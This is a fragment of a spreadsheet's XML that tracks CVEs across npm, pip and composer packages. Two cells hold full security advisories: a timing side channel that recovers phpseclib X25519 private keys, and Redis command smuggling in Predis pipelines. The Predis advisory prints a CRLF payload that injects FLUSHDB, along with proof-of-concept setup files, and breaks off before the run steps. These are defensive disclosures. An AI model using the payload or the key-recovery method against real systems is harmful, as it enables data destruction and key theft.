r="J2393" s="5" t="inlineStr" /><c r="K2393" s="5" t="inlineStr" /><c r="L2393" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M2393" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N2393" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2393" s="5" t="inlineStr" /><c r="P2393" s="5" t="inlineStr" /><c r="Q2393" s="5" t="inlineStr"><is><t>CWE-400, CWE-459</t></is></c><c r="R2393"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S2393" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="2394"><c r="A2394" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2394" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2394" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D2394" s="5" t="inlineStr" /><c r="E2394" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2394" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2394" s="5" t="inlineStr" /><c r="H2394" s="5" t="n"><v>0.002</v></c><c r="I2394" s="5" t="inlineStr" /><c r="J2394" s="5" t="inlineStr" /><c r="K2394" s="5" t="inlineStr" /><c r="L2394" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M2394" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N2394" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2394" s="5" t="inlineStr" /><c r="P2394" s="5" t="inlineStr" /><c r="Q2394" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R2394"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S2394" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="2395"><c r="A2395" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2395" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2395" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D2395" s="5" t="inlineStr" /><c r="E2395" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2395" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2395" s="5" t="inlineStr" /><c r="H2395" s="5" t="n"><v>0.003</v></c><c r="I2395" s="5" t="inlineStr" /><c r="J2395" s="5" t="inlineStr" /><c r="K2395" s="5" t="inlineStr" /><c r="L2395" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M2395" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N2395" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2395" s="5" t="inlineStr" /><c r="P2395" s="5" t="inlineStr" /><c r="Q2395" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="R2395"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S2395" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="2396"><c r="A2396" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2396" s="5" t="inlineStr"><is><t>CVE-2026-7809</t></is></c><c r="D2396" s="5" t="inlineStr" /><c r="E2396" s="5" t="inlineStr" /><c r="F2396" s="5" t="inlineStr" /><c r="G2396" s="5" t="inlineStr" /><c r="H2396" s="5" t="inlineStr" /><c r="I2396" s="5" t="inlineStr" /><c r="J2396" s="5" t="inlineStr" /><c r="K2396" s="5" t="inlineStr" /><c r="L2396" s="5" t="inlineStr" /><c r="M2396" s="5" t="inlineStr" /><c r="N2396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2396" s="5" t="inlineStr" /><c r="Q2396" s="5" t="inlineStr" /><c r="R2396" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2396" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7809</t></is></c></row><row r="2397"><c r="A2397" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2397" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2397" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D2397" s="5" t="inlineStr" /><c r="E2397" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2397" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2397" s="5" t="inlineStr" /><c r="H2397" s="5" t="n"><v>0.002</v></c><c r="I2397" s="5" t="inlineStr" /><c r="J2397" s="5" t="inlineStr" /><c r="K2397" s="5" t="inlineStr" /><c r="L2397" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2397" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N2397" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2397" s="5" t="inlineStr" /><c r="P2397" s="5" t="inlineStr" /><c r="Q2397" s="5" t="inlineStr"><is><t>CWE-88, CWE-200</t></is></c><c r="R2397"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S2397" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="2398"><c r="A2398" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2398" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2398" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D2398" s="5" t="inlineStr" /><c r="E2398" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2398" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2398" s="5" t="inlineStr" /><c r="H2398" s="5" t="n"><v>0.002</v></c><c r="I2398" s="5" t="inlineStr" /><c r="J2398" s="5" t="inlineStr" /><c r="K2398" s="5" t="inlineStr" /><c r="L2398" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M2398" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N2398" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2398" s="5" t="inlineStr" /><c r="P2398" s="5" t="inlineStr" /><c r="Q2398" s="5" t="inlineStr"><is><t>CWE-88, CWE-200</t></is></c><c r="R2398"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S2398" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="2399"><c r="A2399" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2399" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2399" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D2399" s="5" t="inlineStr" /><c r="E2399" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2399" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2399" s="5" t="inlineStr" /><c r="H2399" s="5" t="n"><v>0.003</v></c><c r="I2399" s="5" t="inlineStr" /><c r="J2399" s="5" t="inlineStr" /><c r="K2399" s="5" t="inlineStr" /><c r="L2399" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M2399" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N2399" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2399" s="5" t="inlineStr" /><c r="P2399" s="5" t="inlineStr" /><c r="Q2399" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R2399"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S2399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="2400"><c r="A2400" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2400" s="5" t="inlineStr"><is><t>CVE-2026-82514</t></is></c><c r="D2400" s="5" t="inlineStr" /><c r="E2400" s="5" t="inlineStr" /><c r="F2400" s="5" t="inlineStr" /><c r="G2400" s="5" t="inlineStr" /><c r="H2400" s="5" t="inlineStr" /><c r="I2400" s="5" t="inlineStr" /><c r="J2400" s="5" t="inlineStr" /><c r="K2400" s="5" t="inlineStr" /><c r="L2400" s="5" t="inlineStr" /><c r="M2400" s="5" t="inlineStr" /><c r="N2400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2400" s="5" t="inlineStr" /><c r="Q2400" s="5" t="inlineStr" /><c r="R2400" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="S2400" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82514</t></is></c></row><row r="2401"><c r="A2401" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2401" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2401" s="5" t="inlineStr"><is><t>CVE-2026-84308</t></is></c><c r="D2401" s="5" t="inlineStr" /><c r="E2401" s="5" t="inlineStr" /><c r="F2401" s="5" t="inlineStr" /><c r="G2401" s="5" t="inlineStr" /><c r="H2401" s="5" t="n"><v>0.002</v></c><c r="I2401" s="5" t="inlineStr" /><c r="J2401" s="5" t="inlineStr" /><c r="K2401" s="5" t="inlineStr" /><c r="L2401" s="5" t="inlineStr"><is><t>composer:phpseclib</t></is></c><c r="M2401" s="5" t="inlineStr"><is><t>3.0.57, 4.0.1</t></is></c><c r="N2401" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2401" s="5" t="inlineStr" /><c r="P2401" s="5" t="inlineStr" /><c r="Q2401" s="5" t="inlineStr"><is><t>CWE-208, CWE-385</t></is></c><c r="R2401" s="5" t="inlineStr"><is><t>The pure-PHP X25519 scalar multiplication in phpseclib is not constant-time. Field addition and subtraction each perform a **data-dependent conditional modular reduction**, so the cost of each Montgomery-ladder step is a linear function of that step's reduction count which is a quantity determined by the secret scalar's *prefix*.

An observer with per-ladder-step resolution recovers the 251-bit clamped private scalar. This is a per-step leak, not an aggregate one: an instrumented code proof-of-concept recovers 20/20 test keys from 32 observed operations, and an observer that counts libgmp calls instead of timing them recovers a key from a **single** operation.

This is **not** a low-order-input issue. Recovery works with the RFC 7748 base point `u = 9`, with no attacker-chosen input at all. Rejecting low-order public values does not close it.

## 2. Affected component

Confirmed on **phpseclib 3.0.56** (338 files under `phpseclib/`,`sha256(sorted(relpath NUL file_sha256 LF)) = cc7250b611f520e809131aab0931503457c44d8cbfb10d535251c6fec5f62a2b`).
The code appears unchanged across the 3.0 series wherever Curve25519 is supported, please confirm the affected range.

| file:line | role |
|---|---|
| `Math/PrimeField/Integer.php:189` | `add()` — conditional `subtract($modulo)` when the sum ≥ p |
| `Math/PrimeField/Integer.php:207` | `subtract()` — conditional `add($modulo)` when the result is negative |
| `Crypt/EC/BaseCurves/Montgomery.php:229–234` | ladder branch on the secret bit, selecting argument order of `doubleAndAddPoint` |
| `Crypt/EC/Formats/Keys/MontgomeryPrivate.php:66` | `multiplyPoint(getBasePoint(), dA)` — **no engine check of any kind** |
| `Crypt/EC/Formats/Keys/PKCS8.php:194–200` | the same derivation, correctly gated on ext-sodium — the pattern `MontgomeryPrivate` is missing |

## 3. Technical description

Operation *counts* in the ladder are already constant — 10 field multiplications, 4 additions and 4 subtractions per step, 2560 multiplications per 256-step ladder. Operand *values* are not. Each `PrimeField\Integer::add()` / `subtract()` takes a data-dependent branch costing ~0.85–1.0 µs on the GMP engine, against a ~32 µs step period, so per-step cost is `α + β·c` where `c` is that step's conditional-reduction count. Measured across 20 keys: R² = 0.91–0.98, β = 838–920 ns.

`c` depends on the whole scalar prefix, not on the current bit, so per-step thresholding is useless — it saturates at ~93% per bit for `u = p−1` and at **chance** for `u = 9`, and recovers 0/20 keys either way, because the bit string is a prefix-XOR in which one flipped step inverts the entire tail. Conditioning on the prefix removes the ambiguity: a beam search replays both branches from each candidate ladder state, reads off the exact `c` for each, and scores against the observation. The victim's public key adjudicates the small residual search.

Two facts bound the problem and are worth stating precisely, because they determine whether a fix is needed at all:

- **Aggregate observation is provably useless.** The adjacent-bit transition count `T(k)` has exact entropy `H(T) = 4.0357` bits over clamped scalars, so a noiseless transition-count oracle still leaves ~2^247 candidates. The summed reduction count `Σc` is richer (~6.6–6.9 bits) and still leaves ~2^244. Any measurement that collapses the call to one number is safe. Per-step measurement is not.
- **The libgmp call counts are exactly determined.** Per ladder step, `__gmpz_add = 4 + csub`, `__gmpz_sub = 4 + cadd`, `__gmpz_mul = __gmpz_mod = 10`. Verified by differencing gdb breakpoint counts against phpseclib's own `doubleAndAddPoint` — 27/27 steps exact, extended independently to 64/64 and 38/38 by our two reviewers. An observer that only *counts* these calls needs no timing, no calibration and no repetition.

Results, 20 keys × 3 sampling seeds, 800 traces per path collected from **800 distinct PHP processes** (so the observations are cross-process, as real requests would be):

| observer | path | observations needed | exact 251-bit recovery |
|---|---|---|---|
| timing | key load, `u = 9` | 32 | **20/20 keys**, 95% CI [83.9%, 100%] |
| timing | ECDH, `u = p−1` | 32 | **18/20 keys**, 95% CI [69.9%, 96.8%] |
| timing | either | 8 | 18–23% of trials |
| libgmp call counts | either | **1** | 20/20 keys; tolerates 20–30% of per-step counts being wrong |

The model underlying the decoder is validated against the pinned implementation: 254/254 (key, peer) outputs match the real `DH::computeSecret`, and all four RFC 7748 §6.1 vectors match both phpseclib and the published constants.

Negative controls are clean — wrong public key, shuffled trace, wrong peer value, foreign key: 0/20 in every case. Nothing derived from the private key reaches the decoder; its inputs are the observation vector, the peer value, the victim's public key, and the public clamping constants.

## 5. Impact

In the instrumented, local model, recovery of the clamped scalar gives a permanent compromise of the X25519 private key. Clamping is applied on every call, so the recovered value is what every past and future operation with that key uses.

## 6. Restrictions

**Required for exploitation:**

1. **A reused / long-lived X25519 private key.** Ephemeral X25519 — the normal TLS and SSH case — defeats this outright. phpseclib's own SSH path generates a fresh scalar per exchange and is not affected.
2. **Knowledge of the victim's public key.** It adjudicates the decoder's residual search; without it no candidate can be selected. This is normally public, but it is a precondition, not a convenience.
3. **The pure-PHP path must actually run.** Measured across four extension configurations:
   - `EC::loadFormat('MontgomeryPrivate', $raw32)` runs the ladder in **every**
     configuration — but the format declares `IS_INVISIBLE` (`MontgomeryPrivate.php:40`),
     so `PublicKeyLoader::load` skips it and nothing inside phpseclib calls it. An
     application must name the format explicitly.
   - `PKCS8` / `PublicKeyLoader::load` / `EC::createKey` run the ladder **only when ext-sodium is absent** — `PKCS8.php:194` gates on `sodium_crypto_box_publickey_from_secretkey`. OpenSSL does not help here.
   - `DH::computeSecret` runs the ladder only under `EC::forceEngine('PHP')`, or when *both* `openssl_pkey_derive` (`DH.php:325`) and `sodium_crypto_scalarmult` (`EC/PrivateKey.php:75`) are unavailable. ext-sodium is bundled and enabled by default in PHP 7.2+, so the reachable configurations are a minority — though `disable_functions` hardening and `--disable-sodium` builds do occur, particularly in shared hosting.
4. **An observer with per-ladder-step resolution**, i.e. one that can distinguish ~0.9 µs within a ~32 µs step, or count libgmp entry-point calls. In practice that means local co-residency (e.g. a Flush+Reload spy on the shared `libgmp.so` mapping — `__gmpz_add` / `__gmpz_sub` are the correct targets; `__gmpn_*` are not, being size-dispatched internals).

## 7. Suggested remediation

1. **Constant-time, fixed-width field arithmetic, or delegate to a vetted native provider.** This is the actual fix. Removing the ladder's bit branch is *not* sufficient while `Integer.php:189` and `:207` remain operand-dependent.
2. **Gate `MontgomeryPrivate.php:66` the way `PKCS8.php:194–200` already is.** That is a one-block change and it closes the only entry point that is un-gated in every configuration. Keep the `$curve instanceof Curve25519` guard — `MontgomeryPrivate` also accepts Curve448 keys.
3. **Consider an OpenSSL arm alongside the sodium arm in `PKCS8::loadECDH`**, or fail closed, so stacks without ext-sodium do not fall through to the ladder.
4. Separately, and unrelated to this channel: the pure-PHP path returns an all-zero 32-byte shared secret for low-order peer inputs. Rejecting the full canonicalised low-order set and adding a constant-time all-zero check is correct hygiene for contributory behaviour — but it does **not** mitigate the timing channel, since recovery works with `u = 9`.

## Contact
George Stergiopoulos
Assistant Professor of cybersecurity
Athens University of Economics and Business, Greece
E: geostergiop@aueb.gr | s: https://www.aueb.gr/en/faculty_page/stergiopoulos-georgios</t></is></c><c r="S2401" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84308</t></is></c></row><row r="2402"><c r="A2402" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2402" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2402" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D2402" s="5" t="inlineStr" /><c r="E2402" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2402" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2402" s="5" t="inlineStr" /><c r="H2402" s="5" t="n"><v>0.003</v></c><c r="I2402" s="5" t="inlineStr" /><c r="J2402" s="5" t="inlineStr" /><c r="K2402" s="5" t="inlineStr" /><c r="L2402" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M2402" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N2402" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2402" s="5" t="inlineStr" /><c r="P2402" s="5" t="inlineStr" /><c r="Q2402" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R2402"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S2402" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="2403"><c r="A2403" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2403" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2403" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D2403" s="5" t="inlineStr" /><c r="E2403" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2403" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2403" s="5" t="inlineStr" /><c r="H2403" s="5" t="n"><v>0.004</v></c><c r="I2403" s="5" t="inlineStr" /><c r="J2403" s="5" t="inlineStr" /><c r="K2403" s="5" t="inlineStr" /><c r="L2403" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M2403" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N2403" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2403" s="5" t="inlineStr" /><c r="P2403" s="5" t="inlineStr" /><c r="Q2403" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R2403"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S2403" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="2404"><c r="A2404" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2404" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2404" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D2404" s="5" t="inlineStr" /><c r="E2404" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2404" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2404" s="5" t="inlineStr" /><c r="H2404" s="5" t="n"><v>0.003</v></c><c r="I2404" s="5" t="inlineStr" /><c r="J2404" s="5" t="inlineStr" /><c r="K2404" s="5" t="inlineStr" /><c r="L2404" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M2404" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N2404" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2404" s="5" t="inlineStr" /><c r="P2404" s="5" t="inlineStr" /><c r="Q2404" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R2404"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S2404" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="2405"><c r="A2405" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2405" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2405" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D2405" s="5" t="inlineStr" /><c r="E2405" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2405" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2405" s="5" t="inlineStr" /><c r="H2405" s="5" t="n"><v>0.003</v></c><c r="I2405" s="5" t="inlineStr" /><c r="J2405" s="5" t="inlineStr" /><c r="K2405" s="5" t="inlineStr" /><c r="L2405" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M2405" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N2405" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2405" s="5" t="inlineStr" /><c r="P2405" s="5" t="inlineStr" /><c r="Q2405" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R2405"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S2405" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="2406"><c r="A2406" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2406" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2406" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D2406" s="5" t="inlineStr" /><c r="E2406" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F2406" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2406" s="5" t="inlineStr" /><c r="H2406" s="5" t="n"><v>0.003</v></c><c r="I2406" s="5" t="inlineStr" /><c r="J2406" s="5" t="inlineStr" /><c r="K2406" s="5" t="inlineStr" /><c r="L2406" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M2406" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N2406" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2406" s="5" t="inlineStr" /><c r="P2406" s="5" t="inlineStr" /><c r="Q2406" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R2406"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S2406" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="2407"><c r="A2407" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2407" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2407" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D2407" s="5" t="inlineStr" /><c r="E2407" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2407" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2407" s="5" t="inlineStr" /><c r="H2407" s="5" t="n"><v>0.003</v></c><c r="I2407" s="5" t="inlineStr" /><c r="J2407" s="5" t="inlineStr" /><c r="K2407" s="5" t="inlineStr" /><c r="L2407" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M2407" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N2407" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2407" s="5" t="inlineStr" /><c r="P2407" s="5" t="inlineStr" /><c r="Q2407" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2407"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S2407" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="2408"><c r="A2408" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2408" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2408" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D2408" s="5" t="inlineStr" /><c r="E2408" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2408" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2408" s="5" t="inlineStr" /><c r="H2408" s="5" t="n"><v>0.003</v></c><c r="I2408" s="5" t="inlineStr" /><c r="J2408" s="5" t="inlineStr" /><c r="K2408" s="5" t="inlineStr" /><c r="L2408" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M2408" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N2408" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2408" s="5" t="inlineStr" /><c r="P2408" s="5" t="inlineStr" /><c r="Q2408" s="5" t="inlineStr"><is><t>CWE-79, CWE-184</t></is></c><c r="R2408"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S2408" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="2409"><c r="A2409" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2409" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2409" s="5" t="inlineStr"><is><t>CVE-2026-84372</t></is></c><c r="D2409" s="5" t="inlineStr" /><c r="E2409" s="5" t="inlineStr" /><c r="F2409" s="5" t="inlineStr" /><c r="G2409" s="5" t="inlineStr" /><c r="H2409" s="5" t="n"><v>0.004</v></c><c r="I2409" s="5" t="inlineStr" /><c r="J2409" s="5" t="inlineStr"><is><t>redis</t></is></c><c r="K2409" s="5" t="inlineStr" /><c r="L2409" s="5" t="inlineStr"><is><t>composer:predis/predis</t></is></c><c r="M2409" s="5" t="inlineStr"><is><t>3.3.0</t></is></c><c r="N2409" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2409" s="5" t="inlineStr" /><c r="P2409" s="5" t="inlineStr" /><c r="Q2409" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R2409" s="5" t="inlineStr"><is><t>### Summary

An improper CRLF neutralization flaw in Predis' pipeline handling on
aggregate connections lets an unauthenticated attacker who can influence any
pipelined argument — a value **or** a key, e.g. a URL slug used as a cache key —
smuggle arbitrary Redis commands into the connection.

- On **cluster** connections (`cluster` option, incl. client-side sharding) this
  is remote command injection: shard-wide `FLUSHDB`, targeted `DEL`/`SET`,
  same-slot key theft via `GET`, cache poisoning, and possible node/cluster
  outage.
- On **replication** connections (`replication` option) it is a reliable,
  repeatable denial of service (uncaught fatal error) triggered by any value
  containing `\r\n`.

### Details

When a pipeline is executed over an aggregate connection,
`AbstractAggregateConnection::write()` re-parses the already-serialized pipeline
buffer with `explode("\r\n")` instead of honoring RESP length prefixes:

- https://github.com/predis/predis/blob/v3.2.0/src/Connection/AbstractAggregateConnection.php#L78-L94
  - splits the buffer on `\r\n`, ignoring `$&lt;len&gt;` bulk lengths,
  - rebuilds each chunk via `Command::deserializeCommand()`
    (https://github.com/predis/predis/blob/v3.2.0/src/Command/Command.php#L157)
    to decide routing,
  - writes each chunk to the connection chosen for that (fake) command.

RESP is length-prefixed, so the Redis **server** parses the original stream
correctly — but this second, client-side parser treats attacker-controlled
`\r\n` sequences as command boundaries. An argument such as:

    PAD\r\n*1\r\n$7\r\nFLUSHDB

is a single data value to the server, but a complete, valid `FLUSHDB` command to
the re-parser. The consequence depends on the connection type:

- **Replication:** a pipeline forces `switchToMaster()`, so all chunks go to the
  master and the byte stream stays intact — but the misaligned chunk makes
  `deserializeCommand()` throw an uncaught `UnexpectedValueException: Invalid
  serializing format`. Any value containing `\r\n` (binary serializers such as
  igbinary/msgpack, or multi-line text) reliably crashes the request. This is
  the crash tracked in #1574 — an unauthenticated, repeatable DoS.
- **Cluster:** chunks are routed to different nodes by slot, so the byte stream
  is split across sockets. The smuggled command arrives on a node whose stream
  is clean and is **executed**, though the application never sent it:
  - `FLUSHDB` wipes an entire shard. It has no key but is routable because
    `ClusterStrategy::getFakeKey()` hardcodes the fake key `'key'`
    (https://github.com/predis/predis/blob/v3.2.0/src/Cluster/ClusterStrategy.php#L56
    and #L243-L246), so the smuggled command always lands on the node serving
    `slot('key')`.
  - `INFO` (same fake-key routing) leaks server configuration via orphaned
    responses; `CLUSTER FLUSHSLOTS` can take a node down.
  - Same-slot `GET`/`SET`/`DEL` allow key theft (the reply is attributed to the
    application's own later command on that slot), cache poisoning and targeted
    data destruction; junk-key floods can exhaust node memory (OOM / mass
    eviction of legitimate keys).
  - Lua execution is **not** reachable: `EVAL` cannot be reconstructed (the
    class is `EVAL_` due to the PHP reserved word), `EVAL_RO` fails the `Keys`
    trait validation, and `EVALSHA` requires a pre-loaded script. This is
    accidental, not a designed mitigation, and does not reduce severity —
    `FLUSHDB`/`DEL`/`SET` alone already permit full cache wipes and data
    destruction.

**Affected versions.** Introduced in v3.0.0 by PR #1438 ("Improved pipeline
abstractions"). Affected range: **3.0.0-RC1 through 3.2.0** (v3.0.0-alpha1 is not
affected — the vulnerable code was added after it). v1.x and v2.x are not
affected; their pipelines write per-command via `writeRequest()` and the
vulnerable code path does not exist.

Only `pipeline()` reaches the vulnerable sink; `transaction()` / `MULTI` paths do
not.

### Proof of concept

Two plain `redis:8` containers acting as two shards (PredisCluster shards
client-side, so Redis itself need not be in cluster mode); a PHP app on a
vulnerable Predis checkout (e.g. v3.2.0).

`docker-compose.yml`:

    services:
      redis1:
        image: redis:8
        ports: ["6391:6379"]
      redis2:
        image: redis:8
        ports: ["6392:6379"]

`index.php` (a normal-looking app — slug from URL → cache lookup):

    &lt;?php
    require __DIR__ . '/vendor/autoload.php';

    $nodes  = ['tcp://127.0.0.1:6391', 'tcp://127.0.0.1:6392'];
    $client = new Predis\Client($nodes, ['cluster' =&gt; 'predis',
                'parameters' =&gt; ['read_write_timeout' =&gt; 2]]);

    if (isset($_GET['seed'])) {
        for ($i = 1; $i &lt;= 100; $i++) { $client-&gt;set("user:$i", "data$i"); }
        exit('seeded');
    }

    $slug = $_GET['slug'] ?? '';
    try {
        [$doc] = $client-&gt;pipeline()-&gt;get("slug:$slug")-&gt;execute();
        echo $doc ?: 'no such slug';
    } catch (Throwable $e) {
        http_response_code(500);
        echo get_class($e);
    }

Run:

